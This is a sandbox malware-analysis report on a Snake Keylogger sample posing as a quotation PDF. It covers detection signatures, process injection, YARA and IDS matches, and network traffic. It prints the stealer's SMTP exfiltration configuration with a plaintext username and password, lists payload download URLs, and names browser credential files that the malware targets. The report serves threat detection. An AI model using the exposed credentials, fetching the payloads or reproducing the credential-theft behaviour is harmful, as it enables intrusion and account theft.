Edit tour

Windows Analysis Report
QUOTATION_NOVQTRA071244PDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_NOVQTRA071244PDF.scr.exe
Analysis ID:	1557896
MD5:	e717ed3845849e9a3bfbb53c8ecb87f2
SHA1:	7ae3a696867e9fb90d2633672801ff8dcc6d0d6c
SHA256:	eb52bf1a53d28600ebc350ea1ffdffe1fb619ac9bd2070200fa8b39c8f30a8cd
Tags:	exescruser-abuse_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Creates a thread in another existing process (thread injection)

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_NOVQTRA071244PDF.scr.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe" MD5: E717ED3845849E9A3BFBB53C8ECB87F2)

aspnet_compiler.exe (PID: 6180 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "jsender@qlststv.com", "Password": "sqlv#))OxYLxAXyhMyi", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1914720622.00000210A815E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21c8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x56fe:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.2532886992.000001E500245000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1924921485.00000210C07B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b54d:$a1: get_encryptedPassword 0x1b831:$a2: get_encryptedUsername 0x1b359:$a3: get_timePasswordChanged 0x1b454:$a4: get_passwordField 0x1b563:$a5: set_encryptedPassword 0x1cb58:$a7: get_logins 0x1cabb:$a10: KeyLoggerEventArgs 0x1c754:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1edfc:$x1: $%SMTPDV$ 0x1ee62:$x2: $#TheHashHere%& 0x2044f:$x3: %FTPDV$ 0x20539:$x4: $%TelegramDv$ 0x1c754:$x5: KeyLoggerEventArgs 0x1cabb:$x5: KeyLoggerEventArgs 0x20473:$m2: Clipboard Logs ID 0x20689:$m2: Screenshot Logs ID 0x20799:$m2: keystroke Logs ID 0x20a73:$m3: SnakePW 0x20661:$m4: \SnakeKeylogger\
00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21708:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x24c3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14465:$a1: get_encryptedPassword 0x14749:$a2: get_encryptedUsername 0x14271:$a3: get_timePasswordChanged 0x1436c:$a4: get_passwordField 0x1447b:$a5: set_encryptedPassword 0x15a70:$a7: get_logins 0x159d3:$a10: KeyLoggerEventArgs 0x1566c:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bd4d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1af7f:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b3b2:$a4: \Orbitum\User Data\Default\Login Data 0x1c3f1:$a5: \Kometa\User Data\Default\Login Data
00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1501a:$s1: UnHook 0x15021:$s2: SetHook 0x15029:$s3: CallNextHook 0x15036:$s4: _hook
00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d14:$x1: $%SMTPDV$ 0x17d7a:$x2: $#TheHashHere%& 0x19367:$x3: %FTPDV$ 0x19451:$x4: $%TelegramDv$ 0x1566c:$x5: KeyLoggerEventArgs 0x159d3:$x5: KeyLoggerEventArgs 0x1938b:$m2: Clipboard Logs ID 0x195a1:$m2: Screenshot Logs ID 0x196b1:$m2: keystroke Logs ID 0x1998b:$m3: SnakePW 0x19579:$m4: \SnakeKeylogger\
00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x147058:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x14a58e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: QUOTATION_NOVQTRA071244PDF.scr.exe PID: 7628	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: QUOTATION_NOVQTRA071244PDF.scr.exe PID: 7628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6180	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6180	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6180	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24674:$a1: get_encryptedPassword 0x456b7:$a1: get_encryptedPassword 0x2494e:$a2: get_encryptedUsername 0x45991:$a2: get_encryptedUsername 0x2448a:$a3: get_timePasswordChanged 0x454cd:$a3: get_timePasswordChanged 0x24585:$a4: get_passwordField 0x455c8:$a4: get_passwordField 0x2468a:$a5: set_encryptedPassword 0x456cd:$a5: set_encryptedPassword 0x26a74:$a7: get_logins 0x47ab7:$a7: get_logins 0x269d7:$a10: KeyLoggerEventArgs 0x47a1a:$a10: KeyLoggerEventArgs 0x26670:$a11: KeyLoggerEventArgsEventHandler 0x476b3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aspnet_compiler.exe PID: 6180	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26670:$x5: KeyLoggerEventArgs 0x269d7:$x5: KeyLoggerEventArgs 0x272c5:$x5: KeyLoggerEventArgs 0x275f9:$x5: KeyLoggerEventArgs 0x476b3:$x5: KeyLoggerEventArgs 0x47a1a:$x5: KeyLoggerEventArgs 0x48308:$x5: KeyLoggerEventArgs 0x4863c:$x5: KeyLoggerEventArgs 0x28ba2:$m2: Clipboard Logs ID 0x28c94:$m2: Screenshot Logs ID 0x28cea:$m2: keystroke Logs ID 0x49be5:$m2: Clipboard Logs ID 0x49cd7:$m2: Screenshot Logs ID 0x49d2d:$m2: keystroke Logs ID 0x28e1f:$m3: SnakePW 0x49e62:$m3: SnakePW 0x28c80:$m4: \SnakeKeylogger\ 0x49cc3:$m4: \SnakeKeylogger\
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210c07b0000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.aspnet_compiler.exe.1e56c560000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1e56c560000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1e56c560000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12665:$a1: get_encryptedPassword 0x12949:$a2: get_encryptedUsername 0x12471:$a3: get_timePasswordChanged 0x1256c:$a4: get_passwordField 0x1267b:$a5: set_encryptedPassword 0x13c70:$a7: get_logins 0x13bd3:$a10: KeyLoggerEventArgs 0x1386c:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1e56c560000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19f4d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1917f:$a3: \Google\Chrome\User Data\Default\Login Data 0x195b2:$a4: \Orbitum\User Data\Default\Login Data 0x1a5f1:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1e56c560000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1321a:$s1: UnHook 0x13221:$s2: SetHook 0x13229:$s3: CallNextHook 0x13236:$s4: _hook
5.2.aspnet_compiler.exe.1e56c560000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15f14:$x1: $%SMTPDV$ 0x15f7a:$x2: $#TheHashHere%& 0x17567:$x3: %FTPDV$ 0x17651:$x4: $%TelegramDv$ 0x1386c:$x5: KeyLoggerEventArgs 0x13bd3:$x5: KeyLoggerEventArgs 0x1758b:$m2: Clipboard Logs ID 0x177a1:$m2: Screenshot Logs ID 0x178b1:$m2: keystroke Logs ID 0x17b8b:$m3: SnakePW 0x17779:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14465:$a1: get_encryptedPassword 0x14749:$a2: get_encryptedUsername 0x14271:$a3: get_timePasswordChanged 0x1436c:$a4: get_passwordField 0x1447b:$a5: set_encryptedPassword 0x15a70:$a7: get_logins 0x159d3:$a10: KeyLoggerEventArgs 0x1566c:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bd4d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1af7f:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b3b2:$a4: \Orbitum\User Data\Default\Login Data 0x1c3f1:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1501a:$s1: UnHook 0x15021:$s2: SetHook 0x15029:$s3: CallNextHook 0x15036:$s4: _hook
5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d14:$x1: $%SMTPDV$ 0x17d7a:$x2: $#TheHashHere%& 0x19367:$x3: %FTPDV$ 0x19451:$x4: $%TelegramDv$ 0x1566c:$x5: KeyLoggerEventArgs 0x159d3:$x5: KeyLoggerEventArgs 0x1938b:$m2: Clipboard Logs ID 0x195a1:$m2: Screenshot Logs ID 0x196b1:$m2: keystroke Logs ID 0x1998b:$m3: SnakePW 0x19579:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.1e5100100e8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1e5100100e8.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1e5100100e8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12665:$a1: get_encryptedPassword 0x12949:$a2: get_encryptedUsername 0x12471:$a3: get_timePasswordChanged 0x1256c:$a4: get_passwordField 0x1267b:$a5: set_encryptedPassword 0x13c70:$a7: get_logins 0x13bd3:$a10: KeyLoggerEventArgs 0x1386c:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1e5100100e8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19f4d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1917f:$a3: \Google\Chrome\User Data\Default\Login Data 0x195b2:$a4: \Orbitum\User Data\Default\Login Data 0x1a5f1:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1e5100100e8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1321a:$s1: UnHook 0x13221:$s2: SetHook 0x13229:$s3: CallNextHook 0x13236:$s4: _hook
5.2.aspnet_compiler.exe.1e5100100e8.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15f14:$x1: $%SMTPDV$ 0x15f7a:$x2: $#TheHashHere%& 0x17567:$x3: %FTPDV$ 0x17651:$x4: $%TelegramDv$ 0x1386c:$x5: KeyLoggerEventArgs 0x13bd3:$x5: KeyLoggerEventArgs 0x1758b:$m2: Clipboard Logs ID 0x177a1:$m2: Screenshot Logs ID 0x178b1:$m2: keystroke Logs ID 0x17b8b:$m3: SnakePW 0x17779:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14465:$a1: get_encryptedPassword 0x14749:$a2: get_encryptedUsername 0x14271:$a3: get_timePasswordChanged 0x1436c:$a4: get_passwordField 0x1447b:$a5: set_encryptedPassword 0x15a70:$a7: get_logins 0x159d3:$a10: KeyLoggerEventArgs 0x1566c:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bd4d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1af7f:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b3b2:$a4: \Orbitum\User Data\Default\Login Data 0x1c3f1:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1501a:$s1: UnHook 0x15021:$s2: SetHook 0x15029:$s3: CallNextHook 0x15036:$s4: _hook
5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d14:$x1: $%SMTPDV$ 0x17d7a:$x2: $#TheHashHere%& 0x19367:$x3: %FTPDV$ 0x19451:$x4: $%TelegramDv$ 0x1566c:$x5: KeyLoggerEventArgs 0x159d3:$x5: KeyLoggerEventArgs 0x1938b:$m2: Clipboard Logs ID 0x195a1:$m2: Screenshot Logs ID 0x196b1:$m2: keystroke Logs ID 0x1998b:$m3: SnakePW 0x19579:$m4: \SnakeKeylogger\
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7db2c38.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7db2c38.5.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x95420:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x98956:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xe5458:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0xe898e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d019b0.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d019b0.3.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1466a8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x149bde:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe, ParentProcessId: 7628, ParentProcessName: QUOTATION_NOVQTRA071244PDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 6180, ProcessName: aspnet_compiler.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:12:12.829550+0100	2803305	3	Unknown Traffic	192.168.2.10	49981	188.114.97.3	443	TCP
2024-11-18T18:12:14.514004+0100	2803305	3	Unknown Traffic	192.168.2.10	49983	188.114.97.3	443	TCP
2024-11-18T18:12:22.420486+0100	2803305	3	Unknown Traffic	192.168.2.10	49991	188.114.97.3	443	TCP
2024-11-18T18:12:24.100715+0100	2803305	3	Unknown Traffic	192.168.2.10	49993	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:12:10.216082+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49979	193.122.6.168	80	TCP
2024-11-18T18:12:11.762545+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49979	193.122.6.168	80	TCP
2024-11-18T18:12:13.731332+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49982	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "jsender@qlststv.com", "Password": "sqlv#))OxYLxAXyhMyi", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49980 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49714 version: TLS 1.2

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A8086000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925389461.00000210C0A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A8086000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925389461.00000210C0A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C110A235h	5_2_00007FF7C1109E4D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C1109C1Bh	5_2_00007FF7C11098E6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C110A235h	5_2_00007FF7C110A151
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C110875Bh	5_2_00007FF7C11084FC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C11096EBh	5_2_00007FF7C11093B6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C110783Dh	5_2_00007FF7C110761A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C11082FBh	5_2_00007FF7C110761A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF7C1107470h	5_2_00007FF7C110692A

Source: global traffic	HTTP traffic detected: GET /data-package/Bh1Kj4RD/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/mOA1FV1QAe83 HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /data-package/Bh1Kj4RD/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49982 -> 193.122.6.168:80
